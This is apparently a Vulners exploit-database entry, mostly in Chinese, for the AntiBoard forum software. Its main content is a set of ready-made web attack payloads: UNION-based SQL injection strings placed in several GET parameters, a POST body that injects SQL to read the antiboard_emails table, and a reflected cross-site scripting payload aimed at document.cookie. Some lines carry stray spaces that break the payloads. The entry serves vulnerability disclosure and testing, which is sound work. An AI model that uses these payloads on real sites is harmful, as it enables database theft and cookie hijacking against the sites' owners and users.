Vulners
Lucene search
AntiBoardSQL注入及跨站脚本攻击漏洞 Exploit
Josh Gilmour ([email protected])提供了如下测试方法:
/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=thr eaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20w hatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1
A remote user can also submit an HTTP POST request with the following parameters to inject SQL commands:
poster_name=1111&poster_email=1111&message_title=1111&message_bo dy=1111&submit=Submit%2bmessage&thread_id=3&mode=
ALL select field from antiboard_emails----&reply=reply
http://[target]/antiboard.php?thread_id=1&mode=threaded&range=&feedback=<script>alert(docu ment.cookie);</script>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2006 00:00Current
7.1High risk
Vulners AI Score7.1